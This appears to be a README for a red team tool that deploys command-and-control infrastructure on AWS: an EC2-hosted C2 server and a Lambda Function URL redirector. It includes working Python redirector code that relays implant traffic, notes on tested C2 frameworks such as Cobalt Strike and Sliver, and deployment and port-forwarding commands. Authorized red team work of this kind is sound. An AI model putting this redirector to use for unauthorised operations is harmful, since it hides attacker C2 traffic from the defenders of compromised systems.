Red Lambda is an AWS CloudFormation template that automatically deploys red team infrastructure in the cloud. My blog post covers more details about the background of this project.
A basic red team infrastructure is deployed using the lamda.yml AWS CloudFormation template.
Infrastructure includes:
- VPC and Subnet
- EC2 with SSM Enabled to host a C2
- Lambda Function to act as redirector
- Lambda Function URL to expose redirector to internet
The Lambda function's Python code is embedded in the CloudFormation template. However, I've copied it into the lambda.py file for review.
Personally, I just create the Lambda function manually in the AWS console using the code from lambda.py, as it's pretty quick to do.
The AWS Lambda function can now run on newer Python runtimes such as 3.11 or 3.12 with small modifications. Python 3.7 is no longer supported by Lambda, and the newer Python runtimes don't bundle the Python requests library, so we have to add it ourselves. The changes to the code and to the deployment process needed to support requests on the newer runtimes are detailed in the section below.
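The redirector is the piece of the stack that is easiest to get subtly wrong (dropped binary bodies, forwarded hop-by-hop headers, mangled content-encoding), so here is an added, illustrative version of what such a Function URL redirector looks like. This is example code written for this page, not the repo's lambda.py; the C2_URL environment variable, the header strip lists and the SAMPLE_EVENT are all assumptions. It uses the requests library exactly as the layer steps below require, but imports it inside the forwarding function so the translation logic can be exercised offline with a fake C2.

```python
"""Added example: a Lambda Function URL redirector that forwards each inbound
request to a C2 server with the requests library. Illustrative code, not the
lambda.py shipped with the repo; names like C2_URL are assumptions."""
import base64
import os

# Hypothetical configuration: the C2 origin, read from a Lambda environment
# variable so the function code carries no hard-coded host.
C2_URL = os.environ.get("C2_URL", "https://c2.example.internal")

# Headers that belong to the Function URL hop, not to the C2 connection.
STRIP_REQUEST_HEADERS = {
    "host", "content-length", "connection", "x-forwarded-for",
    "x-forwarded-proto", "x-forwarded-port", "x-amzn-trace-id",
}
# Response headers that Lambda recomputes or that requests' automatic
# decompression would make wrong if passed through unchanged.
STRIP_RESPONSE_HEADERS = {"content-length", "transfer-encoding",
                          "content-encoding", "connection"}


def build_upstream_request(event, c2_url=C2_URL):
    """Translate a Function URL event (payload format 2.0) into the
    method, URL, headers and raw body to replay against the C2."""
    method = event["requestContext"]["http"]["method"]
    url = c2_url.rstrip("/") + event.get("rawPath", "/")
    if event.get("rawQueryString"):
        url += "?" + event["rawQueryString"]
    headers = {k: v for k, v in event.get("headers", {}).items()
               if k.lower() not in STRIP_REQUEST_HEADERS}
    raw = event.get("body") or ""
    # Function URLs base64-encode binary bodies, which C2 traffic often is.
    body = base64.b64decode(raw) if event.get("isBase64Encoded") else raw.encode()
    return method, url, headers, body


def build_lambda_response(status, headers, content):
    """Wrap the C2 reply in the Function URL response shape. The body is
    always base64-encoded so binary payloads survive the trip back."""
    kept = {k: v for k, v in headers.items()
            if k.lower() not in STRIP_RESPONSE_HEADERS}
    return {"statusCode": status, "headers": kept,
            "body": base64.b64encode(content).decode("ascii"),
            "isBase64Encoded": True}


def forward_with_requests(method, url, headers, body):
    """Send the replayed request with requests (supplied by the Lambda Layer).
    Redirects are not followed so the C2's own 3xx responses pass through."""
    import requests  # imported here so the module loads without the layer
    r = requests.request(method, url, headers=headers, data=body,
                         allow_redirects=False, timeout=10)
    return r.status_code, dict(r.headers), r.content


def lambda_handler(event, context, forward=forward_with_requests):
    """Entry point configured on the Lambda function."""
    method, url, headers, body = build_upstream_request(event)
    status, resp_headers, content = forward(method, url, headers, body)
    return build_lambda_response(status, resp_headers, content)


# Constructed sample event, shaped like what a Function URL delivers for an
# implant POST whose JSON body arrived base64-encoded.
SAMPLE_EVENT = {
    "rawPath": "/api/v1/tasks",
    "rawQueryString": "id=7",
    "headers": {"host": "abc123.lambda-url.us-east-1.on.aws",
                "user-agent": "Mozilla/5.0", "content-type": "application/json",
                "x-forwarded-for": "203.0.113.9"},
    "requestContext": {"http": {"method": "POST"}},
    "body": base64.b64encode(b'{"k":"v"}').decode("ascii"),
    "isBase64Encoded": True,
}


def demo():
    """Run the handler against SAMPLE_EVENT with a fake C2 (no network) and
    return what the redirector sent upstream and what it returned."""
    seen = {}

    def fake_c2(method, url, headers, body):
        seen.update(method=method, url=url, headers=headers, body=body)
        # A gzip Content-Encoding header on already-decoded content is
        # exactly the mismatch the response filter exists to drop.
        return 200, {"Content-Type": "text/plain", "Content-Length": "5",
                     "Content-Encoding": "gzip"}, b"hello"

    response = lambda_handler(SAMPLE_EVENT, None, forward=fake_c2)
    return seen, response


if __name__ == "__main__":
    print(demo())
```

Two design points worth keeping in any real redirector: `allow_redirects=False`, so a C2 profile that answers with a 3xx is relayed rather than followed inside the Lambda, and always returning `isBase64Encoded: True`, which avoids the silent corruption you get when a Function URL tries to treat an implant's binary response as UTF-8 text.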
Frameworks tested while developing this tool include:
- Cobalt Strike setting data to be sent in message body
- Mythic using the Athena agent using the http profile
- Sliver using the http listener (encountered some throttling issues under heavy load)
- Covenant using the http listener with SSL enabled (upload a random pfx cert)
- AWS CLI: https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html
- AWS CLI Session Manager Plugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-working-with-install-plugin.html
From the command line, run the following command to start creating the infrastructure:
aws cloudformation deploy --stack-name Red --template-file red.yml --capabilities CAPABILITY_NAMED_IAM
From the command line, run the following command to destroy the infrastructure:
aws cloudformation delete-stack --stack-name Red
After deploying the infrastructure, use the following aws-cli commands to find necessary information.
List EC2 instances:
aws ec2 describe-instances --query 'Reservations[*].Instances[0].{Name:Tags[?Key==`Name`].Value|[0],Instance:InstanceId,IP:PublicIpAddress, State:State.Name}' --output table
No need for internet facing SSH systems or jump boxes!
Simply use AWS Systems Manager (SSM) from the AWS CLI to interact with your infrastructure.
Access any of the EC2 instances by using the AWS CLI through the aws ssm command:
aws ssm start-session --target <instance id>
Use SSM to port forward to your local machine:
aws ssm start-session --target <instance id> --document-name AWS-StartPortForwardingSession --parameters "portNumber"=["80"],"localPortNumber"=["1234"]
Note: This is helpful if your C2 has a web management interface or teamserver port that must be accessed locally.
AWS Lambda no longer supports Python 3.7 as of 2024, and the newer Lambda Python runtimes don't bundle the requests library.
Follow these steps to fix this issue:
- Create an AWS Lambda Layer (one-time setup only): the Lambda Layer lets us supply the Python requests library code ourselves, which our redirector function uses.
- Use this post to create a zip file of the Python requests library, which we'll upload as a Lambda Layer in AWS.
- Note: Be sure the Python version used to build the requests package matches the Python runtime selected for your Lambda function.
- Once you have your requests zip package from the above step, in AWS go to Lambda → Layers → Create Layer → upload the requests.zip package → select Python 3.11 (or whatever Python version you're using) → Create.
- Modify your function code to use the updated code in lambda.py from this repo, which supports the requests library on the newer Python version.
- Change the Lambda runtime to Python 3.11 (or whatever version your requests layer was built for) and attach the layer to the function.
- Now you're good to go! Test it out to confirm it works.
- You can use curl to hit your endpoint and view the logs on the C2 server to ensure the requests are coming through without errors.
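The two ways the layer step fails in practice are a zip whose packages are not under a top-level python/ directory (Lambda unpacks a layer into /opt and the Python runtime only searches /opt/python and /opt/python/lib/pythonX.Y/site-packages) and a site-packages tree built for a different interpreter version than the function's runtime. Both show up as "No module named 'requests'" at invocation time, long after the layer uploaded fine. Here is an added example, not code from this repo or from the post the steps refer to, that builds the requests.zip with pip and then checks a zip's layout against the intended runtime before you upload it; the build_layer_zip function needs network access, while check_layer_zip and demo run offline on constructed zips.

```python
"""Added example (not from the repo): build a requests Lambda Layer zip and
check its layout before uploading. A Python layer must put packages under
python/ (or python/lib/pythonX.Y/site-packages/) to be importable."""
import os
import re
import subprocess
import sys
import tempfile
import zipfile

LAYER_PREFIX = "python/"
SITE_PACKAGES_RE = re.compile(r"^python/lib/python(\d+\.\d+)/site-packages/")


def build_layer_zip(out_path, package="requests", python=sys.executable):
    """Install `package` into a python/ staging directory with pip and zip it.
    Needs network access. Run it with the same interpreter version as the
    Lambda runtime so any version-specific paths and wheels line up."""
    with tempfile.TemporaryDirectory() as staging:
        target = os.path.join(staging, "python")
        subprocess.run([python, "-m", "pip", "install", package, "-t", target],
                       check=True)
        with zipfile.ZipFile(out_path, "w", zipfile.ZIP_DEFLATED) as zf:
            for root, _dirs, files in os.walk(target):
                for name in files:
                    full = os.path.join(root, name)
                    # Archive paths are relative to staging, so they start
                    # with python/, which is what Lambda expects.
                    zf.write(full, os.path.relpath(full, staging))
    return out_path


def check_layer_zip(path, runtime="python3.11", package="requests"):
    """Return (ok, problems) for a layer zip destined for `runtime`.
    Catches the mistakes the steps above warn about: packages not under
    python/, a site-packages tree built for another interpreter version,
    and the package simply being absent."""
    problems = []
    with zipfile.ZipFile(path) as zf:
        names = zf.namelist()

    outside = [n for n in names if not n.startswith(LAYER_PREFIX)]
    if outside:
        problems.append(f"{len(outside)} entries outside python/: {outside[:3]}")

    want = runtime[len("python"):]  # "python3.11" -> "3.11"
    for n in names:
        m = SITE_PACKAGES_RE.match(n)
        if m and m.group(1) != want:
            problems.append(f"site-packages built for python{m.group(1)}, "
                            f"runtime is {runtime}")
            break

    pkg_re = re.compile(rf"^python/(lib/python\d+\.\d+/site-packages/)?"
                        rf"{re.escape(package)}/__init__\.py$")
    if not any(pkg_re.match(n) for n in names):
        problems.append(f"{package}/__init__.py not found under python/")

    return (not problems, problems)


def make_test_zip(path, entries):
    """Write a constructed zip containing the given entry names (empty files)."""
    with zipfile.ZipFile(path, "w") as zf:
        for name in entries:
            zf.writestr(name, b"")
    return path


def demo():
    """Check one correct and two broken constructed layouts; returns the
    three (ok, problems) results in that order."""
    with tempfile.TemporaryDirectory() as d:
        good = make_test_zip(os.path.join(d, "good.zip"),
                             ["python/requests/__init__.py",
                              "python/urllib3/__init__.py"])
        flat = make_test_zip(os.path.join(d, "flat.zip"),
                             ["requests/__init__.py"])  # missing python/ prefix
        wrong = make_test_zip(os.path.join(d, "wrong.zip"),
                              ["python/lib/python3.9/site-packages/"
                               "requests/__init__.py"])  # built for 3.9
        return (check_layer_zip(good), check_layer_zip(flat),
                check_layer_zip(wrong))


if __name__ == "__main__":
    for ok, problems in demo():
        print("OK" if ok else "FAIL", problems)
```

Run check_layer_zip against your real requests.zip with the runtime you plan to select in the Layers console; if it reports a python3.X mismatch, rebuild the zip with that interpreter rather than changing the function's runtime to fit the zip.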